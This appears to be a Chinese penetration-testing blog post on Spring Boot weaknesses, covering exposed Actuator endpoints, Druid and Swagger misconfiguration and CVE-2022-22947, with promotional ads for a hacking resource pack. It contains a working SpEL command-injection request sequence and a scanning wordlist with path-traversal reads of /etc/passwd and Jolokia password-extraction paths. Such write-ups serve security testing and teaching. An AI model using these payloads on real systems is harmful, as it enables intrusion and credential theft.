前言
随着互联网的不断发展,现在的Web开发发展越来越快,更多的企业选择使用框架快速搭建自己的系统。在众多的框架中,Spring Boot因为简单和高效的优点,受到了众多开发者的青睐。
先来介绍一下Spring Boot,Spring Boot是由Pivotal团队提供的一套开源框架,可以简化spring应用的创建及部署。它提供了丰富的Spring模块化支持,可以帮助开发者更轻松快捷地构建出企业级应用。Spring Boot通过自动配置功能,降低了复杂性,同时支持基于JVM的多种开源框架,可以缩短开发时间,使开发更加简单和高效。
使用搜索引擎查看,也可以看见SpringBoot是如此的火热。
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
常见漏洞合集
Spring Boot Actuator未授权访问漏洞利用
对于这个actuator相信大部分师傅都不陌生,Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。当这些端点存在配置不当的时候,就有可能导致一些系统信息泄露、 RCE 等安全问题。
-
Spring Boot 1.x版本端点在根URL下注册
-
Spring Boot 2.x版本端点移动到/actuator/路径
参考官网文档,其中常用的端点功能描述如下:
Actuator 禁用了大部分端点。因此,默认情况下只有 /health 和 /info 这两个端点可用。
-
/auditevents列出了与安全审计相关的事件,如用户登录/注销。此外,还可以根据 Principal 或类型等字段进行过滤。 -
/beans返回BeanFactory中所有可用的 Bean。与/auditevents不同,它不支持过滤。 -
/conditions(之前称为/autoconfig)会生成有关自动配置条件的报告。 -
/configprops允许获取所有@ConfigurationPropertiesBean。 -
/env返回当前环境属性(Environment Properties),也可以检索单个属性。 -
/flyway提供了有关 Flyway 数据库迁移的详细信息。 -
/health汇总了应用的健康状况。 -
/heapdump会构建并返回应用所用 JVM 的 Heap Dump。 -
/info返回一般信息。它可能是自定义数据、构建信息或最新提交的详细信息。 -
/liquibase的行为类似于/flyway,但针对的是 Liquibase。 -
/logfile返回普通应用日志。 -
/loggers能够查询和修改应用的日志级别。 -
/metrics详细介绍了应用的指标。这可能包括通用指标和自定义指标。 -
/prometheus返回的指标与前一个类似,但格式化后可与 Prometheus 服务器一起使用。 -
/scheduledtasks提供了应用中每个计划(定时)任务的详细信息。 -
/sessions列出了 HTTP Session,前提是正在使用 Spring Session。 -
/shutdown可以优雅地关闭应用。 -
/threaddump会 dump 底层 JVM 的线程信息。
其中当heapdump、env、threaddump等端点存在未授权访问时,咱们可以从中获取到服务器存在的敏感信息,包括OSS秘钥、数据库连接密码、redis连接密码、配置环境等,导致系统信息泄露甚至丢失权限。
案例
这是某次测试过程中发现存在的heapdump泄露,从中发现数据库密码、redis密码以及公众号appid和appsecret,并实现公众号接管。
Druid配置不当
严格来说这个应该不算SpringBoot的漏洞,只是在配置过程中没有做好权限控制,或者存在弱口令导致。
当druid未配置鉴权时,咱们可以直接获取druid配置信息。
访问 url/xxxx/druid/basic.json
当存在弱口令时,咱们也是可以进入后台,查看可能存在的session等,获取相应系统权限。
Spring Cloud Gateway RCE漏洞
参考自博客:
CVE-2022-22947:Spring Cloud Gateway RCE漏洞分析以及复现_cve-2022-22947漏洞复现-优快云博客
https://blog.youkuaiyun.com/qq_50808416/article/details/130677837
由于Spring Cloud Gateway也是一种微服务的应用,所以也可以让Actuator对它进行监控,本漏洞就是通过Actuator操作gateway接口列表来实现远程执行命令
当我们查看存在gateway接口时,可以通过构造恶意路由,从而实现rec。
创建路由
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.2.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 331
{
"id": "test",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
"name": "result"
}
}
],
"uri": "http://example.com:80",
"order": 0
}
刷新路由
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.2.131:8080
Connection: close
Content-Type: application/x-www-form-urlencoded
访问创建的新路由获取执行的结果
显示执行了whoami的命令
GET /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.2.131:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
Swagger未授权访问
swagger就是一个在你写接口的时候自动帮你生成接口文档的东西,只要你遵循它的规范并写一些接口的说明注解即可。
当配置不当时会存在接口文档泄露,如果存在权限管理不当,会造成越权漏洞,信息泄露等。
常见目录总结
以下是SpringBoot常用的一下路径,在扫描SpringBoot时可以达到事半功倍的效果
/
/#/wallboard
/%20/swagger-ui.html
/Swagger/ui/index
/acl/article?id=66
/acm
/actuator
/actuator/#/wallboard
/actuator/acm
/actuator/admin/swagger-ui.html
/actuator/api-docs
/actuator/api.html
/actuator/api/index.html
/actuator/api/swagger-ui.html
/actuator/api/v2/api-docs
/actuator/api/v2/swagger.json
/actuator/archaius
/actuator/article?id=${7*7}
/actuator/article?id=66
/actuator/auditLog
/actuator/auditevents
/actuator/auditevents/actuator/intergrationgraph
/actuator/autoconfig
/actuator/beans
/actuator/beans/actuator/jolokia
/actuator/beans1
/actuator/caches
/actuator/caches/actuator/refresh
/actuator/caches/cache
/actuator/channels
/actuator/conditions
/actuator/conditions/actuator/jolokia/list
/actuator/conditions1
/actuator/configprops
/actuator/configurationMetadata
/actuator/distv2/index.html
/actuator/docs
/actuator/druid/login.html
/actuator/dubbo-provider/distv2/index.html
/actuator/dump
/actuator/env
/actuator/env/actuator/liquibase
/actuator/env/java.home
/actuator/env/spring.jmx.enabled
/actuator/env/system
/actuator/events
/actuator/exportRegisteredServices
/actuator/features
/actuator/features/actuator/peripheral/swagger-ui.html
/actuator/flyway
/actuator/gateway
/gateway
/actuator/h2-console
/actuator/health
/actuator/health/
/actuator/health/actuator/loggers
/actuator/healthcheck
/actuator/heapdump
/actuator/httptrace
/actuator/httptrace/actuator/mappings
/actuator/hystrix.stream
/actuator/hystrix.stream/*/actuator/swagger
/actuator/info
/actuator/info/actuator/metrics
/actuator/integrationgraph
/actuator/intergrationgraph
/actuator/jolokia
/actuator/jolokia/*/actuator/static/swagger.json
/actuator/jolokia/list
/actuator/liquibase
/actuator/logfile
/actuator/logfile/actuator/sw/swagger-ui.html
/actuator/loggers
/actuator/loggers/
/actuator/loggingConfig
/actuator/management/heapdump
/actuator/mappings
/actuator/mappings
/actuator/mappings/actuator/monitor/conditions
/actuator/metrics
/actuator/metrics
/actuator/metrics/
/actuator/metrics/actuator/monitor/env
/actuator/monitor/auditevents
/actuator/monitor/conditions
/actuator/monitor/env
/actuator/monitor/loggers
/actuator/monitor/mappings
/actuator/monitor/scheduledtasks
/actuator/monitor/threaddump
/actuator/peripheral/swagger-ui.html
/actuator/peripheral/v2/api-docs
/actuator/prometheus
/actuator/prometheus/actuator/swagger-dubbo/api-docs
/actuator/refresh
/actuator/refresh/actuator/peripheral/v2/api-docs
/actuator/registeredServices
/actuator/releaseAttributes
/actuator/resolveAttributes
/actuator/restart
/actuator/scheduledtasks
/actuator/scheduledtasks/actuator/monitor/mappings
/actuator/sentinel
/actuator/service-registry/actuator/prometheus
/actuator/sessions
/actuator/sessions/
/actuator/sessions/actuator/swagger-ui.html
/actuator/shutdown
/actuator/spring-security-oauth-resource/swagger-ui.html
/actuator/spring-security-rest/api/swagger-ui.html
/actuator/springWebflow
/actuator/sso
/actuator/ssoSessions
/actuator/static/swagger.json
/actuator/statistics
/actuator/status
/actuator/sw/swagger-ui.html
/actuator/swagger
/actuator/swagger-dubbo/api-docs
/actuator/swagger-resourcesce
/actuator/swagger-ui
/actuator/swagger-ui.html
/actuator/swagger-ui/index.html
/actuator/swagger/codes
/actuator/swagger/index.html
/actuator/swagger/static/index.html
/actuator/system/
/actuator/system/env
/actuator/system/mappings
/actuator/system/showOsInfo
/actuator/system/showProperties
/actuator/template/swagger-ui.html
/actuator/threaddump
/actuator/threaddump/actuator/monitor/scheduledtasks
/actuator/tra
/actuator/trace
/actuator/user/swagger-ui.html
/admin/swagger-ui.html
/api
/api-docs
/api-docs/swagger.json
/api.html
/api/api-docs
/api/apidocs
/api/doc
/api/index.html
/api/swagger
/api/swagger-resources
/api/swagger-ui
/api/swagger-ui.html
/api/swagger-ui.json
/api/swagger.json
/api/swagger/
/api/swagger/ui
/api/swaggerui
/api/v1/
/api/v1/api-docs
/api/v1/apidocs
/api/v1/login
/api/v1/swagger
/api/v1/swagger-resources
/api/v1/swagger-ui
/api/v1/swagger-ui.html
/api/v1/swagger-ui.json
/api/v1/swagger.json
/api/v1/swagger/
/api/v2
/api/v2/api-docs
/api/v2/apidocs
/api/v2/login
/api/v2/swagger
/api/v2/swagger-resources
/api/v2/swagger-ui
/api/v2/swagger-ui.html
/api/v2/swagger-ui.json
/api/v2/swagger.json
/api/v2/swagger/
/api/v3
/apidocs
/apidocs/swagger.json
/article?id=${7*7}
/article?id=66
/auditevents
/autoconfig
/beans
/beans1
/caches
/channels
/clients
/clients/actuator/system/showOsInfo
/clients/all/actuator/tra
/clients/saveOrUpdate/actuator/trace
/cloudfoundryapplication
/conditions
/conditions1
/configprops
/distv2/index.html
/doc.html
/docs
/docs/
/druid/*/actuator/swagger/codes
/druid/api.html
/druid/basic.json
/druid/datasource.html
/druid/index.html
/druid/login.html
/druid/spring.html
/druid/sql.html
/druid/wall.html
/druid/webapp.html
/druid/websession.html
/druid/weburi.html
/dubbo-provider/distv2/index.html
/dump
/entity/all
/env
/env/
/env/(name)
/env/java.home
/env/spring
/env/spring.jmx.enabled
/env/{name}
/error/actuator/monitor/threaddump
/eureka
/eureka/*/actuator/service-registry
/features
/flyway
/gateway/actuator
/gateway/actuator/auditevents
/gateway/actuator/beans
/gateway/actuator/conditions
/gateway/actuator/configprops
/gateway/actuator/env
/gateway/actuator/health
/gateway/actuator/heapdump
/gateway/actuator/httptrace
/gateway/actuator/hystrix.stream
/gateway/actuator/info
/gateway/actuator/jolokia
/gateway/actuator/logfile
/gateway/actuator/loggers
/gateway/actuator/mappings
/gateway/actuator/metrics
/gateway/actuator/scheduledtasks
/gateway/actuator/swagger-ui.html
/gateway/actuator/threaddump
/gateway/actuator/trace
/get
/graphql
/h2-console
/health
/health/
/heapdump
/heapdump.json
/httptrace
/hystrix
/hystrix.stream
/info
/intergrationgraph
/jolokia
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url
/jolokia/list
/lastn/actuator/sessions
/libs/swaggerui
/liquibase
/list
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/logfile
/loggers
/login/admin/swagger-ui.html
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/management/heapdump
/mappings
/metrics
/metrics/
/metrics/mem
/metrics/{name}
/monitor
/monitor/auditevents
/monitor/beans
/monitor/conditions
/monitor/configprops
/monitor/env
/monitor/health
/monitor/heapdump
/monitor/httptrace
/monitor/hystrix.stream
/monitor/info
/monitor/jolokia
/monitor/loggers
/monitor/mappings
/monitor/metrics
/monitor/scheduledtasks
/monitor/threaddump
/oauth/authorize/actuator/swagger/index.html
/oauth/check_token/actuator/swagger/static/index.html
/oauth/client/token/api-docs
/oauth/confirm_access/actuator/system/
/oauth/error/actuator/system/env
/oauth/get/token/api.html
/oauth/refresh/token/api/doc
/oauth/remove/token/api/index.html
/oauth/token/actuator/system/mappings
/oauth/token/list/api/swagger
/oauth/user/token/api/swagger-resources
/oauth/userinfo/api/swagger-ui.html
/peripheral/swagger-ui.html
/peripheral/v2/api-docs
/prometheus
/redis/keysSize/api/swagger/ui
/redis/memoryInfo/api/swaggerui
/refresh
/restart
/scheduledtasks
/services
/services/1
/services/api/v2/api-docs
/services/findAlls/api/v1/api-docs
/services/findOnes/api/v1/login
/services/granted/api/v1/swagger-resources
/services/saveOrUpdate/api/v1/swagger-ui.html
/sessions
/shutdown
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/static/swagger.json
/sw/swagger-ui.html
/swagger
/swagger-dubbo/api-docs
/swagger-resources
/swagger-resources/actuator/shutdown
/swagger-resources/configuration/security
/swagger-resources/configuration/security/actuator/spring-security-oauth-resource/swagger-ui.html
/swagger-resources/configuration/ui
/swagger-resources/configuration/ui/actuator/spring-security-rest/api/swagger-ui.html
/swagger-ui
/swagger-ui.html
/swagger-ui.html#
/swagger-ui.html/api/v2/swagger.json
/swagger-ui.json
/swagger-ui/html
/swagger-ui/index.html
/swagger-ui/swagger.json
/swagger.json
/swagger.yml
/swagger/
/swagger/codes
/swagger/index.html
/swagger/static/index.html
/swagger/swagger-ui.html
/swagger/ui
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/system/
/system/druid/index.html
/system/druid/login.html
/system/druid/websession.html
/system/env
/system/mappings
/system/showOsInfo
/system/showProperties
/template/swagger-ui.html
/threaddump
/trace
/trace/
/uc/env
/user/swagger-ui.html
/v1.1/swagger-ui.html
/v1.2/swagger-ui.html
/v1.3/swagger-ui.html
/v1.4/swagger-ui.html
/v1.5/swagger-ui.html
/v1.6/swagger-ui.html
/v1.7/swagger-ui.html
/v1.8/swagger-ui.html
/v1.9/swagger-ui.html
/v1/agent/self/actuator/system/showProperties
/v1/api-docs
/v1/catalog/service/app
/v1/catalog/services/actuator/threaddump
/v1/swagger.json
/v2.0/swagger-ui.html
/v2.1/swagger-ui.html
/v2.2/swagger-ui.html
/v2.3/swagger-ui.html
/v2/api-docs
/v2/api-docs?group=swagger接口文档
/v2/swagger.json
/v3/api-docs
/validata/code
/version
/webpage/system/druid/index.html
/webpage/system/druid/login.html
/webpage/system/druid/websession.html
/actuator/gateway/routes
/actuator/get
/gateway/routes/new_route
/actuator/gateway/routes/new_route
/new_route
/actuator/gateway/refresh
/gateway/refresh
/actuator/gateway/globalfilters
/actuator/gateway/routefilters
/actuator/gatewayroutes/1
/actuator/nacos
/actuator/nacos-config/actuator/swagger-resourcesce
/actuator/nacos-discovery/actuator/swagger-ui
/actuator/nacosconfig
/actuator/nacos/v1/cs/configs
/actuator/nacos/v1/cs/configs?dataId=Misplaced
/actuator/nacos/v1/ns/instance
/actuator/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
/actuator/nacos/v2/cs/configs
/actuator/nacos/v2/cs/configs?dataId=Misplaced
/actuator/nacos/v2/ns/instance
/actuator/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
/actuator/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/actuator/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/nacos
/nacos/v1/cs/configs
/nacos/v1/cs/configs?dataId=Misplaced
/nacos/v1/ns/instance
/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v2/cs/configs
/nacos/v2/cs/configs?dataId=Misplaced
/nacos/v2/ns/instance
/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/v1/cs/configs
/v1/cs/configs?dataId=Misplaced
/v1/ns/instance
/v1/ns/instance?serviceName=springboot2-nacos-discovery
/v2/cs/configs
/v2/cs/configs?dataId=Misplaced
/v2/ns/instance
/v2/ns/instance?serviceName=springboot2-nacos-discovery
/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/nacos/v3/cs/configs
/nacos/v3/cs/configs?dataId=Misplaced
/nacos/v3/ns/instance
/nacos/v3/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/v3/cs/configs
/v3/cs/configs?dataId=Misplaced
/v3/ns/instance
/v3/ns/instance?serviceName=springboot2-nacos-discovery
/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/actuator/archaius/actuator/nacosdiscovery
/actuator/configprops/actuator/nacos
/actuator/health/nacos
/actuator/heapdump/actuator/loggers/nacos
/actuator/loggers/actuator/metrics/nacos
/env/nacos
/get?serviceName=springboot2-nacos-discovery
/metrics/nacos
/webjars/**/actuator/nacosconfig
/actuator/nacos/config
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
扫一扫
1068
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
